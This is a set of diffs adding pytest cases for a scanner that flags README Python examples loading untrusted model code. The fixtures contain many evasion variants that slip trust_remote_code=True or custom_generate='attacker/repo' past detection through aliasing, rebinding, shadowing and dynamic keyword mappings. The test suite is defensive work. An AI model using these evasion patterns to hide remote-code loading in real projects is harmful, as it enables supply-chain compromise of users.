+            "alias = options = {'custom_generate': None}\n"
+            f"{function_definition}"
+            "alias |= {'custom_generate': 'attacker/repo'}\n"
+            "model.generate(**options)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "local_shadow",
+        [
+            "helper = lambda alias: alias\n",
+            "helper = lambda *alias: alias\n",
+            "helper = lambda **alias: alias\n",
+            "ignored = [None for alias in [{}]]\n",
+            "ignored = {None for alias in [{}]}\n",
+            "ignored = {None: None for alias in [{}]}\n",
+            "ignored = (None for alias in [{}])\n",
+            "def helper():\n    alias = {}\n",
+            "class Helper:\n    alias = {}\n",
+            "class Helper:\n    def method(self, alias):\n        pass\n",
+        ],
+        ids=[
+            "lambda-positional",
+            "lambda-var-positional",
+            "lambda-var-keyword",
+            "list-comprehension",
+            "set-comprehension",
+            "dict-comprehension",
+            "generator-expression",
+            "nested-function-local",
+            "class-local",
+            "method-parameter",
+        ],
+    )
+    def test_readme_python_example_rejects_alias_mutation_after_local_scope_shadow(
+        self,
+        local_shadow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "requests.get(image_url, stream=True)\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "alias = options = {'custom_generate': None}\n"
+            f"{local_shadow}"
+            "alias |= {'custom_generate': 'attacker/repo'}\n"
+            "model.generate(**options)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_rejects_alias_mutation_after_unproven_loop_target_rebind(self) -> None:
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"alias = options = {'custom_generate': None}\n"
+            b"for alias in []:\n"
+            b"    pass\n"
+            b"alias |= {'custom_generate': 'attacker/repo'}\n"
+            b"model.generate(**options)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "definition",
+        [
+            "def helper(alias=(alias := {})):\n    pass\n",
+            "async def helper(alias=(alias := {})):\n    pass\n",
+        ],
+        ids=["function-default", "async-function-default"],
+    )
+    def test_readme_python_example_allows_alias_mutation_after_module_scope_default_rebind(
+        self,
+        definition: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "alias = options = {'input_ids': 1}\n"
+            f"{definition}"
+            "alias |= {'custom_generate': 'attacker/repo'}\n"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "expression_rebind",
+        [
+            "False or (alias := {})\n",
+            "True and (alias := {})\n",
+            "(alias := {}) or True\n",
+            "(alias := {}) and False\n",
+            "False or False or (alias := {})\n",
+            "True and True and (alias := {})\n",
+            "(alias := {}) if True else None\n",
+            "None if False else (alias := {})\n",
+            "True if (alias := {}) else False\n",
+        ],
+        ids=[
+            "false-or-rhs",
+            "true-and-rhs",
+            "or-first-operand",
+            "and-first-operand",
+            "chained-or",
+            "chained-and",
+            "ifexp-selected-body",
+            "ifexp-selected-else",
+            "ifexp-condition",
+        ],
+    )
+    def test_readme_python_example_allows_alias_mutation_after_proven_expression_rebind(
+        self,
+        expression_rebind: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "alias = options = {'input_ids': 1}\n"
+            f"{expression_rebind}"
+            "alias |= {'custom_generate': 'attacker/repo'}\n"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
 
         findings = NetworkCommDetector().scan(data, "README.md")
 

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -6064,6 +6064,162 @@ class TestNetworkCommDetector:
         [
             (
                 "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = inputs.to('cpu')\n"
+                "inputs |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs: object = inputs.to('cpu')\n"
+                "inputs |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = inputs.to('cpu')\n"
+                "inputs = inputs.to('xpu:0')\n"
+                "inputs['trust_remote_code'] = True\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = inputs.to('cpu')\n"
+                "old = inputs\n"
+                "inputs = {}\n"
+                "old |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "old_device_inputs = inputs.to('cuda')\n"
+                "inputs = inputs.to('cpu')\n"
+                "device_inputs = inputs.to('xpu:0')\n"
+                "inputs = {}\n"
+                "old_device_inputs |= {'trust_remote_code': True}\n"
+            ),
+        ],
+        ids=[
+            "same-name-transfer",
+            "annotated-same-name-transfer",
+            "repeated-same-name-transfer",
+            "post-transfer-alias-source-rebind",
+            "renamed-same-name-renamed-chain",
+        ],
+    )
+    def test_readme_python_example_rejects_mutated_live_same_name_transfer_alias(
+        self,
+        mapping_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_flow}"
+            "model.generate(**device_inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "mapping_flow",
+        [
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = inputs.to('cpu')\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = inputs.to('cpu')\n"
+                "inputs = inputs.to('xpu:0')\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = inputs.to('cpu')\n"
+                "inputs = {}\n"
+                "inputs |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
+                "old = inputs\n"
+                "device_inputs = inputs.to('cuda')\n"
+                "inputs = inputs.to('cpu')\n"
+                "old = {}\n"
+                "old |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+        ],
+        ids=[
+            "same-name-transfer",
+            "repeated-same-name-transfer",
+            "source-rebound-after-transfer",
+            "alias-rebound-after-transfer",
+        ],
+    )
+    def test_readme_python_example_allows_detached_same_name_transfer_alias(
+        self,
+        mapping_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_flow}"
+            "model.generate(**device_inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "same_name_transfer",
+        [
+            "inputs = inputs.to(image.mode)\n",
+            "inputs = inputs.to('cpu', non_blocking=True)\n",
+        ],
+        ids=["dynamic-device", "extra-keyword"],
+    )
+    def test_readme_python_example_rejects_unproven_same_name_transfer_alias(
+        self,
+        same_name_transfer: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "inputs = processor(images=image, return_tensors='pt')\n"
+            "device_inputs = inputs.to('cuda')\n"
+            f"{same_name_transfer}"
+            "inputs |= {'custom_generate': 'attacker/repo'}\n"
+            "model.generate(**device_inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "mapping_flow",
+        [
+            (
+                "inputs = processor(images=image, return_tensors='pt')\n"
                 "alias = inputs\n"
                 "alias |= {'custom_generate': 'attacker/repo'}\n"
                 "device_inputs = inputs.to('cuda')\n"

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3077,6 +3077,57 @@ class TestNetworkCommDetector:
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
 
+    def test_readme_python_example_allows_v4_positional_use_model_defaults(self) -> None:
+        """Transformers v4 position 10 is `use_model_defaults`, not `custom_generate`."""
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"model.generate(None, None, None, None, None, None, None, None, None, None, True)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_bounds_repeated_mapping_expansion(self) -> None:
+        """Repeated safe mapping expansion must stay linear in the unique AST."""
+        mapping_bindings = ["options_0 = {'custom_generate': None}"]
+        mapping_bindings.extend(
+            f"options_{index} = {{**options_{index - 1}, **options_{index - 1}}}" for index in range(1, 31)
+        )
+        mapping_source = "\n".join(mapping_bindings)
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            f"{mapping_source}\n"
+            "model.generate(**options_30)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_rejects_cyclic_generate_kwargs_mapping(self) -> None:
+        """Memoization must not turn cyclic mapping provenance into a trusted value."""
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"options_a = {**options_b}\n"
+            b"options_b = {**options_a}\n"
+            b"model.generate(**options_a)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
     @pytest.mark.parametrize(
         "remote_call",
         [

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2959,6 +2959,51 @@ class TestNetworkCommDetector:
         assert any(finding["type"] == "network_function" for finding in findings)
 
     @pytest.mark.parametrize(
+        "remote_code_argument",
+        [
+            "trust_remote_code=1",
+            "trust_remote_code='true'",
+            "trust_remote_code=not False",
+            "trust_remote_code=allow_remote_code",
+            "**{'trust_remote_code': True}",
+            "**remote_options",
+        ],
+    )
+    def test_readme_python_example_rejects_truthy_or_dynamic_remote_code_trust(
+        self,
+        remote_code_argument: str,
+    ) -> None:
+        remote_code_binding = ""
+        if remote_code_argument == "trust_remote_code=allow_remote_code":
+            remote_code_binding = "allow_remote_code = True\n"
+        elif remote_code_argument == "**remote_options":
+            remote_code_binding = "remote_options = {'trust_remote_code': True}\n"
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            f"{remote_code_binding}"
+            f"AutoModel.from_pretrained('attacker/model', {remote_code_argument})\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_allows_explicitly_disabled_remote_code_trust(self) -> None:
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"AutoModel.from_pretrained('official/model', trust_remote_code=False)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
         "additional_fence",
         [
             "```python\n# requests powers our image download\nprint('ok')\n```\n",

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3287,6 +3287,149 @@ class TestNetworkCommDetector:
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     @pytest.mark.parametrize(
+        ("factory_name", "model_setup", "model_call"),
+        [
+            (
+                "AutoModelForImageClassification",
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n",
+                "outputs = model(**inputs)\n",
+            ),
+            (
+                "T5ForConditionalGeneration",
+                "factory_options = {'revision': 'main', 'trust_remote_code': False}\n"
+                "model = T5ForConditionalGeneration.from_pretrained('official/model', **factory_options)\n",
+                "outputs = model(**inputs)\n",
+            ),
+            (
+                "AutoModelForImageClassification",
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n",
+                "with torch.no_grad():\n    outputs = model(**inputs)\n",
+            ),
+            (
+                "AutoModelForImageClassification",
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n",
+                "outputs = model(**inputs)\nmodel = evil\n",
+            ),
+            (
+                "AutoModelForImageClassification",
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n",
+                "outputs = model(**inputs); model = evil\n",
+            ),
+        ],
+        ids=["canonical", "safe-factory-options", "no-grad", "post-call-rebind", "same-line-post-call"],
+    )
+    def test_readme_python_example_allows_proven_transformers_model_call(
+        self,
+        factory_name: str,
+        model_setup: str,
+        model_call: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\n"
+            f"from transformers import {factory_name}\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "inputs = {'pixel_values': 1}\n"
+            "def evil(**kwargs):\n"
+            "    requests.get(image_url, stream=True)\n"
+            f"{model_setup}{model_call}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "model_flow",
+        [
+            (
+                "model = AutoModelForImageClassification.from_pretrained("
+                "'attacker/repo', trust_remote_code=True)\n"
+                "outputs = model(**inputs)\n"
+            ),
+            (
+                "factory_options = {'trust_remote_code': True}\n"
+                "model = AutoModelForImageClassification.from_pretrained("
+                "'attacker/repo', **factory_options)\n"
+                "outputs = model(**inputs)\n"
+            ),
+            (
+                "factory_args = ['attacker/repo']\n"
+                "model = AutoModelForImageClassification.from_pretrained(*factory_args)\n"
+                "outputs = model(**inputs)\n"
+            ),
+            (
+                "factory_options = evil()\n"
+                "model = AutoModelForImageClassification.from_pretrained("
+                "'attacker/repo', **factory_options)\n"
+                "outputs = model(**inputs)\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n"
+                "model = evil\n"
+                "outputs = model(**inputs)\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model'); "
+                "model = evil; outputs = model(**inputs)\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n"
+                "for model in [evil]:\n"
+                "    outputs = model(**inputs)\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n"
+                "selected = model if len(image_url) == 0 else evil\n"
+                "outputs = selected(**inputs)\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n"
+                "if len(image_url):\n"
+                "    model = evil\n"
+                "outputs = model(**inputs)\n"
+            ),
+            (
+                "model = AutoModelForImageClassification.from_pretrained('official/model')\n"
+                "calls = (model(**inputs) for _ in range(1))\n"
+                "model = evil\n"
+                "for output in calls:\n"
+                "    print(output)\n"
+            ),
+        ],
+        ids=[
+            "remote-code-keyword",
+            "remote-code-mapping",
+            "starred-factory-args",
+            "unknown-factory-options",
+            "model-rebind",
+            "same-line-model-rebind",
+            "model-shadow",
+            "mixed-model-alias",
+            "conditional-model-rebind",
+            "deferred-model-call",
+        ],
+    )
+    def test_readme_python_example_rejects_unproven_transformers_model_call(
+        self,
+        model_flow: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\n"
+            "from transformers import AutoModelForImageClassification\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "inputs = {'pixel_values': 1}\n"
+            "def evil(**kwargs):\n"
+            "    requests.get(image_url, stream=True)\n"
+            f"{model_flow}```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
         ("alias_setup", "mapping_setup", "remote_call", "remote_key"),
         [
             (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -3834,6 +3834,28 @@ class TestNetworkCommDetector:
         assert all(finding["severity"] == "INFO" for finding in findings)
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
+    def test_readme_python_example_allows_ordered_nested_standalone_mapping_transfer(self) -> None:
+        """A standalone transfer may follow its binding in one supported body."""
+        data = (
+            b"```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            b"from transformers import AutoModel, AutoProcessor\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            b"processor = AutoProcessor.from_pretrained('official/model')\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"with torch.no_grad():\n"
+            b"    inputs = processor(images=image, return_tensors='pt')\n"
+            b"    inputs.to('cuda')\n"
+            b"    model.generate(**inputs)\n"
+            b"```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert findings
+        assert all(finding["severity"] == "INFO" for finding in findings)
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
     def test_readme_python_example_allows_inline_transfer_of_proven_mapping(self) -> None:
         """A proven BatchEncoding may be transferred directly at generate."""
         data = (
@@ -3876,6 +3898,50 @@ class TestNetworkCommDetector:
             "inputs = processor(images=image, return_tensors='pt')\n"
             f"{transfer}"
             "model.generate(**inputs)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "body",
+        [
+            (
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    alias = inputs\n"
+                "    alias |= {'custom_generate': 'attacker/repo'}\n"
+                "    inputs.to('cuda')\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    inputs = {'custom_generate': 'attacker/repo'}\n"
+                "    inputs.to('cuda')\n"
+                "    model.generate(**inputs)\n"
+            ),
+            (
+                "    inputs = processor(images=image, return_tensors='pt')\n"
+                "    inputs.to(image.mode)\n"
+                "    model.generate(**inputs)\n"
+            ),
+        ],
+        ids=["prior-alias-mutation", "prior-rebind", "dynamic-device"],
+    )
+    def test_readme_python_example_rejects_unsafe_nested_standalone_mapping_transfer(
+        self,
+        body: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nimport torch\nfrom PIL import Image\n"
+            "from transformers import AutoModel, AutoProcessor\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "image = Image.open(requests.get(image_url, stream=True).raw)\n"
+            "processor = AutoProcessor.from_pretrained('official/model')\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "with torch.no_grad():\n"
+            f"{body}```\n"
         ).encode()
 
         findings = NetworkCommDetector().scan(data, "README.md")
@@ -4202,6 +4268,213 @@ class TestNetworkCommDetector:
         findings = NetworkCommDetector().scan(data, "README.md")
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "later_operation",
+        [
+            "        print(options)\n",
+            "        options['custom_generate'] = 'attacker/repo'\n",
+            "        for options['custom_generate'] in ['attacker/repo']:\n            pass\n",
+            ("        alias = options\n        alias |= {'custom_generate': 'attacker/repo'}\n"),
+        ],
+        ids=["read", "subscript-mutation", "loop-target-mutation", "alias-mutation"],
+    )
+    def test_readme_python_example_allows_mapping_use_before_later_same_body_operation(
+        self,
+        later_operation: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            "if True:\n"
+            "    if True:\n"
+            "        model.generate(**options)\n"
+            f"{later_operation}"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "prior_operation",
+        [
+            "        print(options)\n",
+            "        options['custom_generate'] = 'attacker/repo'\n",
+            "        for options['custom_generate'] in ['attacker/repo']:\n            pass\n",
+            ("        alias = options\n        alias |= {'custom_generate': 'attacker/repo'}\n"),
+        ],
+        ids=["read", "subscript-mutation", "loop-target-mutation", "alias-mutation"],
+    )
+    def test_readme_python_example_rejects_mapping_use_after_prior_same_body_operation(
+        self,
+        prior_operation: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            "if True:\n"
+            "    if True:\n"
+            f"{prior_operation}"
+            "        model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "detached_mutation",
+        [
+            "alias['custom_generate'] = 'attacker/repo'\n",
+            "alias |= {'custom_generate': 'attacker/repo'}\n",
+        ],
+        ids=["subscript-assignment", "augmented-assignment"],
+    )
+    def test_readme_python_example_allows_detached_alias_mutation(
+        self,
+        detached_mutation: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            "alias = options\n"
+            "alias = {}\n"
+            f"{detached_mutation}"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_allows_mutation_before_alias_binding(self) -> None:
+        """An alias's old object must not taint the mapping it is later bound to."""
+        data = (
+            b"```python\nimport requests\nfrom transformers import AutoModel\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"model = AutoModel.from_pretrained('official/model')\n"
+            b"options = {'custom_generate': None}\n"
+            b"alias = {}\n"
+            b"alias['custom_generate'] = 'attacker/repo'\n"
+            b"alias = options\n"
+            b"model.generate(**options)\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        "alias_operations",
+        [
+            "detached = {}\nalias = options\ndetached |= {'custom_generate': 'attacker/repo'}\nalias = detached\n",
+            "detached = {}\nalias = options\nalias = detached\ndetached |= {'custom_generate': 'attacker/repo'}\n",
+        ],
+        ids=[
+            "future-edge-cannot-reactivate-old-edge",
+            "mutation-after-endpoint-rebind",
+        ],
+    )
+    def test_readme_python_example_allows_temporally_disconnected_alias_mutation(
+        self,
+        alias_operations: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            f"{alias_operations}"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    @pytest.mark.parametrize(
+        ("alias_operations", "mapping_name"),
+        [
+            (
+                "detached = {}\nalias = options\nalias |= {'custom_generate': 'attacker/repo'}\nalias = detached\n",
+                "options",
+            ),
+            (
+                "detached = {}\ndetached |= {'custom_generate': 'attacker/repo'}\nalias = detached\n",
+                "alias",
+            ),
+        ],
+        ids=["mutation-before-endpoint-rebind", "mutation-propagates-forward"],
+    )
+    def test_readme_python_example_rejects_temporally_connected_alias_mutation(
+        self,
+        alias_operations: str,
+        mapping_name: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            f"{alias_operations}"
+            f"model.generate(**{mapping_name})\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "alias_operations",
+        [
+            "alias = options\nalias['custom_generate'] = 'attacker/repo'\n",
+            ("alias = options\nalias['custom_generate'] = 'attacker/repo'\nalias = {}\n"),
+            ("alias = first_alias = options\nalias = {}\nfirst_alias['custom_generate'] = 'attacker/repo'\n"),
+            (
+                "first_alias = options\nalias = first_alias\nfirst_alias = {}\n"
+                "alias |= {'custom_generate': 'attacker/repo'}\n"
+            ),
+        ],
+        ids=[
+            "active-alias",
+            "mutation-before-rebind",
+            "surviving-chained-alias",
+            "surviving-sequential-alias",
+        ],
+    )
+    def test_readme_python_example_rejects_active_alias_mutation(
+        self,
+        alias_operations: str,
+    ) -> None:
+        data = (
+            "```python\nimport requests\nfrom transformers import AutoModel\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "model = AutoModel.from_pretrained('official/model')\n"
+            "options = {'custom_generate': None}\n"
+            f"{alias_operations}"
+            "model.generate(**options)\n"
+            "requests.get(image_url, stream=True)\n```\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
 
     @pytest.mark.parametrize(
         "post_call_operation",

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2967,6 +2967,8 @@ class TestNetworkCommDetector:
             "trust_remote_code=allow_remote_code",
             "**{'trust_remote_code': True}",
             "**remote_options",
+            "custom_generate='attacker/repo'",
+            "**{'custom_generate': 'attacker/repo'}",
         ],
     )
     def test_readme_python_example_rejects_truthy_or_dynamic_remote_code_trust(
@@ -2990,6 +2992,53 @@ class TestNetworkCommDetector:
 
         assert any(finding["type"] == "network_library" for finding in findings)
